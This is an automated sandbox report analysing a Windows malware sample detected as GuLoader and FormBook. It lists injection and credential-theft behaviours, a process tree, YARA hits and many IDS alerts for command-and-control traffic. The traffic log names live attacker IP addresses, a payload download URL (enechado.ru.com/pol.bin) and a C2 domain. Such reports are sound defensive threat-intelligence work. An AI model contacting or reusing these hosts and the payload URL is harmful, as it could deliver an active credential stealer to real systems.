Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZAMOWIEN.BAT.exe

Overview

General Information

Sample name:ZAMOWIEN.BAT.exe
Analysis ID:1562240
MD5:936fd06cf63ed725bdb6bc4c83bed228
SHA1:ce4ec27a6a48dd8be5879bbdaf90cc3bda91a3a5
SHA256:c41569f8bec1ed93da1978dbf2d97005a7db32ccb9d526ee17a6c7027fc6fc8c
Infos:

Detection

FormBook, GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • ZAMOWIEN.BAT.exe (PID: 8000 cmdline: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe" MD5: 936FD06CF63ED725BDB6BC4C83BED228)
    • ZAMOWIEN.BAT.exe (PID: 4604 cmdline: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe" MD5: 936FD06CF63ED725BDB6BC4C83BED228)
      • RAVCpl64.exe (PID: 7484 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • sdchange.exe (PID: 7976 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)
          • firefox.exe (PID: 5620 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000002.33323827525.000000000825E000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T11:57:26.782948+010020507451Malware Command and Control Activity Detected192.168.11.2049742195.110.124.13380TCP
          2024-11-25T11:57:50.161110+010020507451Malware Command and Control Activity Detected192.168.11.2049746172.67.145.23480TCP
          2024-11-25T11:58:03.411981+010020507451Malware Command and Control Activity Detected192.168.11.204975013.248.169.4880TCP
          2024-11-25T11:58:17.449975+010020507451Malware Command and Control Activity Detected192.168.11.204975431.31.196.17780TCP
          2024-11-25T11:58:40.408404+010020507451Malware Command and Control Activity Detected192.168.11.2049758208.91.197.2780TCP
          2024-11-25T11:58:56.102812+010020507451Malware Command and Control Activity Detected192.168.11.20497628.210.46.2180TCP
          2024-11-25T11:59:10.375169+010020507451Malware Command and Control Activity Detected192.168.11.2049766154.88.22.10580TCP
          2024-11-25T11:59:24.984610+010020507451Malware Command and Control Activity Detected192.168.11.204977043.155.76.12480TCP
          2024-11-25T11:59:38.501517+010020507451Malware Command and Control Activity Detected192.168.11.204977466.29.149.4680TCP
          2024-11-25T11:59:52.319964+010020507451Malware Command and Control Activity Detected192.168.11.204977881.88.58.21680TCP
          2024-11-25T12:00:05.860877+010020507451Malware Command and Control Activity Detected192.168.11.2049782104.21.27.5980TCP
          2024-11-25T12:00:19.517988+010020507451Malware Command and Control Activity Detected192.168.11.204978645.81.23.2580TCP
          2024-11-25T12:00:40.908404+010020507451Malware Command and Control Activity Detected192.168.11.204979013.248.169.4880TCP
          2024-11-25T12:00:57.538289+010020507451Malware Command and Control Activity Detected192.168.11.2049791195.110.124.13380TCP
          2024-11-25T12:01:10.756632+010020507451Malware Command and Control Activity Detected192.168.11.2049795172.67.145.23480TCP
          2024-11-25T12:01:23.896683+010020507451Malware Command and Control Activity Detected192.168.11.204979913.248.169.4880TCP
          2024-11-25T12:01:37.597904+010020507451Malware Command and Control Activity Detected192.168.11.204980531.31.196.17780TCP
          2024-11-25T12:02:00.202516+010020507451Malware Command and Control Activity Detected192.168.11.2049809208.91.197.2780TCP
          2024-11-25T12:02:14.324984+010020507451Malware Command and Control Activity Detected192.168.11.20498138.210.46.2180TCP
          2024-11-25T12:02:28.406599+010020507451Malware Command and Control Activity Detected192.168.11.2049817154.88.22.10580TCP
          2024-11-25T12:02:42.598122+010020507451Malware Command and Control Activity Detected192.168.11.204982143.155.76.12480TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T11:56:55.967429+010028032702Potentially Bad Traffic192.168.11.2049741103.83.194.5080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T11:54:45.212490+010028554641A Network Trojan was detected192.168.11.2049806208.91.197.2780TCP
          2024-11-25T11:54:45.212490+010028554641A Network Trojan was detected192.168.11.204974913.248.169.4880TCP
          2024-11-25T11:54:45.212490+010028554641A Network Trojan was detected192.168.11.2049807208.91.197.2780TCP
          2024-11-25T11:54:45.212490+010028554641A Network Trojan was detected192.168.11.2049808208.91.197.2780TCP
          2024-11-25T11:54:45.212490+010028554641A Network Trojan was detected192.168.11.2049756208.91.197.2780TCP
          2024-11-25T11:54:45.212490+010028554641A Network Trojan was detected192.168.11.2049755208.91.197.2780TCP
          2024-11-25T11:54:45.212490+010028554641A Network Trojan was detected192.168.11.204978913.248.169.4880TCP
          2024-11-25T11:54:45.212490+010028554641A Network Trojan was detected192.168.11.204979813.248.169.4880TCP
          2024-11-25T11:54:45.212490+010028554641A Network Trojan was detected192.168.11.2049757208.91.197.2780TCP
          2024-11-25T11:57:42.267241+010028554641A Network Trojan was detected192.168.11.2049743172.67.145.23480TCP
          2024-11-25T11:57:44.895063+010028554641A Network Trojan was detected192.168.11.2049744172.67.145.23480TCP
          2024-11-25T11:57:47.526021+010028554641A Network Trojan was detected192.168.11.2049745172.67.145.23480TCP
          2024-11-25T11:57:55.495788+010028554641A Network Trojan was detected192.168.11.204974713.248.169.4880TCP
          2024-11-25T11:57:58.132050+010028554641A Network Trojan was detected192.168.11.204974813.248.169.4880TCP
          2024-11-25T11:58:09.222705+010028554641A Network Trojan was detected192.168.11.204975131.31.196.17780TCP
          2024-11-25T11:58:11.966222+010028554641A Network Trojan was detected192.168.11.204975231.31.196.17780TCP
          2024-11-25T11:58:14.713888+010028554641A Network Trojan was detected192.168.11.204975331.31.196.17780TCP
          2024-11-25T11:58:47.583285+010028554641A Network Trojan was detected192.168.11.20497598.210.46.2180TCP
          2024-11-25T11:58:50.451907+010028554641A Network Trojan was detected192.168.11.20497608.210.46.2180TCP
          2024-11-25T11:58:53.292980+010028554641A Network Trojan was detected192.168.11.20497618.210.46.2180TCP
          2024-11-25T11:59:01.910298+010028554641A Network Trojan was detected192.168.11.2049763154.88.22.10580TCP
          2024-11-25T11:59:04.730265+010028554641A Network Trojan was detected192.168.11.2049764154.88.22.10580TCP
          2024-11-25T11:59:07.559152+010028554641A Network Trojan was detected192.168.11.2049765154.88.22.10580TCP
          2024-11-25T11:59:16.466040+010028554641A Network Trojan was detected192.168.11.204976743.155.76.12480TCP
          2024-11-25T11:59:19.296293+010028554641A Network Trojan was detected192.168.11.204976843.155.76.12480TCP
          2024-11-25T11:59:22.149584+010028554641A Network Trojan was detected192.168.11.204976943.155.76.12480TCP
          2024-11-25T11:59:30.448709+010028554641A Network Trojan was detected192.168.11.204977166.29.149.4680TCP
          2024-11-25T11:59:33.126531+010028554641A Network Trojan was detected192.168.11.204977266.29.149.4680TCP
          2024-11-25T11:59:35.818839+010028554641A Network Trojan was detected192.168.11.204977366.29.149.4680TCP
          2024-11-25T11:59:44.169087+010028554641A Network Trojan was detected192.168.11.204977581.88.58.21680TCP
          2024-11-25T11:59:46.886019+010028554641A Network Trojan was detected192.168.11.204977681.88.58.21680TCP
          2024-11-25T11:59:49.604023+010028554641A Network Trojan was detected192.168.11.204977781.88.58.21680TCP
          2024-11-25T11:59:57.977751+010028554641A Network Trojan was detected192.168.11.2049779104.21.27.5980TCP
          2024-11-25T12:00:00.604309+010028554641A Network Trojan was detected192.168.11.2049780104.21.27.5980TCP
          2024-11-25T12:00:03.227728+010028554641A Network Trojan was detected192.168.11.2049781104.21.27.5980TCP
          2024-11-25T12:00:11.407437+010028554641A Network Trojan was detected192.168.11.204978345.81.23.2580TCP
          2024-11-25T12:00:14.114086+010028554641A Network Trojan was detected192.168.11.204978445.81.23.2580TCP
          2024-11-25T12:00:16.821997+010028554641A Network Trojan was detected192.168.11.204978545.81.23.2580TCP
          2024-11-25T12:00:33.001844+010028554641A Network Trojan was detected192.168.11.204978713.248.169.4880TCP
          2024-11-25T12:00:35.628618+010028554641A Network Trojan was detected192.168.11.204978813.248.169.4880TCP
          2024-11-25T12:01:03.194457+010028554641A Network Trojan was detected192.168.11.2049792172.67.145.23480TCP
          2024-11-25T12:01:05.526905+010028554641A Network Trojan was detected192.168.11.2049793172.67.145.23480TCP
          2024-11-25T12:01:08.454141+010028554641A Network Trojan was detected192.168.11.2049794172.67.145.23480TCP
          2024-11-25T12:01:15.979446+010028554641A Network Trojan was detected192.168.11.204979613.248.169.4880TCP
          2024-11-25T12:01:18.618885+010028554641A Network Trojan was detected192.168.11.204979713.248.169.4880TCP
          2024-11-25T12:01:29.365463+010028554641A Network Trojan was detected192.168.11.204980231.31.196.17780TCP
          2024-11-25T12:01:32.128405+010028554641A Network Trojan was detected192.168.11.204980331.31.196.17780TCP
          2024-11-25T12:01:34.872641+010028554641A Network Trojan was detected192.168.11.204980431.31.196.17780TCP
          2024-11-25T12:02:05.820043+010028554641A Network Trojan was detected192.168.11.20498108.210.46.2180TCP
          2024-11-25T12:02:08.678892+010028554641A Network Trojan was detected192.168.11.20498118.210.46.2180TCP
          2024-11-25T12:02:11.500723+010028554641A Network Trojan was detected192.168.11.20498128.210.46.2180TCP
          2024-11-25T12:02:19.956015+010028554641A Network Trojan was detected192.168.11.2049814154.88.22.10580TCP
          2024-11-25T12:02:22.779835+010028554641A Network Trojan was detected192.168.11.2049815154.88.22.10580TCP
          2024-11-25T12:02:25.607019+010028554641A Network Trojan was detected192.168.11.2049816154.88.22.10580TCP
          2024-11-25T12:02:34.062658+010028554641A Network Trojan was detected192.168.11.204981843.155.76.12480TCP
          2024-11-25T12:02:36.902634+010028554641A Network Trojan was detected192.168.11.204981943.155.76.12480TCP
          2024-11-25T12:02:39.750798+010028554641A Network Trojan was detected192.168.11.204982043.155.76.12480TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Yara matchFile source: 00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: ZAMOWIEN.BAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: ZAMOWIEN.BAT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: sdchange.pdbGCTL source: ZAMOWIEN.BAT.exe, 00000002.00000003.33540855304.00000000076AA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdb source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: wntdll.pdbUGP source: ZAMOWIEN.BAT.exe, 00000002.00000003.33487623850.00000000374F0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ZAMOWIEN.BAT.exe, ZAMOWIEN.BAT.exe, 00000002.00000003.33487623850.00000000374F0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe
          Source: Binary string: mshtml.pdbUGP source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: sdchange.pdb source: ZAMOWIEN.BAT.exe, 00000002.00000003.33540855304.00000000076AA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4x nop then mov ebx, 00000004h2_2_373D04EF
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h3_2_0068F4EF
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then mov ebx, 00000004h4_2_047404EF

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49758 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49750 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49742 -> 195.110.124.133:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 66.29.149.46:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49743 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49748 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49754 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49744 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49766 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49745 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49774 -> 66.29.149.46:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49786 -> 45.81.23.25:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49747 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 45.81.23.25:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49751 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 66.29.149.46:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 81.88.58.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 66.29.149.46:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49753 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49790 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 45.81.23.25:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 104.21.27.59:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 104.21.27.59:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 45.81.23.25:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49817 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49794 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 81.88.58.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49762 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49821 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 104.21.27.59:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49791 -> 195.110.124.133:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49795 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49746 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 81.88.58.216:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49778 -> 81.88.58.216:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49805 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49782 -> 104.21.27.59:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49770 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49799 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49815 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49813 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49809 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49806 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49749 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49755 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49757 -> 208.91.197.27:80
          Source: DNS query: www.tals.xyz
          Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
          Source: Joe Sandbox ViewIP Address: 103.83.194.50 103.83.194.50
          Source: Joe Sandbox ViewIP Address: 103.83.194.50 103.83.194.50
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49741 -> 103.83.194.50:80
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: global trafficHTTP traffic detected: GET /pol.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: enechado.ru.comCache-Control: no-cache
